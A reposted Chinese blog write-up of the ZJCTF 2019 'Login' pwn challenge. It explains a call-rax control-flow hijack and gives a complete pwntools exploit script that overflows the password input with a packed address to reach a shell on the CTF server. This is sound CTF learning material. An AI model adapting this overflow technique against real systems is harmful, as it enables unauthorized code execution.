碼上歡樂
相關內容    簡體    繁體

[ZJCTF 2019]Login

本文轉載自   查看原文   2020-02-29 19:40   691 

exp 腳本

  C++寫的程序,逆向分析有點費勁。注意到 password_checker 有 call rax 指令,倒推 rax 的來源,在 main 函數中把 rax 的來源覆蓋為漏洞函數的地址即可 get shell

from pwn import *

io = remote('node3.buuoj.cn',27283)

shell = 0x400e88
io.sendlineafter(': ','admin')
io.sendlineafter(': ','2jctf_pa5sw0rd'+'\x00'*58+p64(shell))

io.interactive()

感謝 keer 師傅的指點!


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 [ZJCTF 2019]NiZhuanSiWei [ZJCTF 2019]NiZhuanSiWei [ZJCTF 2019]EasyHeap [ZJCTF 2019]NiZhuanSiWei [ZJCTF 2019]NiZhuanSiWei 1詳解 [ZJCTF 2019]EasyHeap | house of spirit 調試記錄 [原題復現+審計][ZJCTF 2019] WEB NiZhuanSiWei(反序列化、PHP偽協議、數組繞過) [BJDCTF2020]ZJCTF,不過如此 [BJDCTF2020]ZJCTF,不過如此 SWPUCTF_2019_login(格式字符串偏移bss段)
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM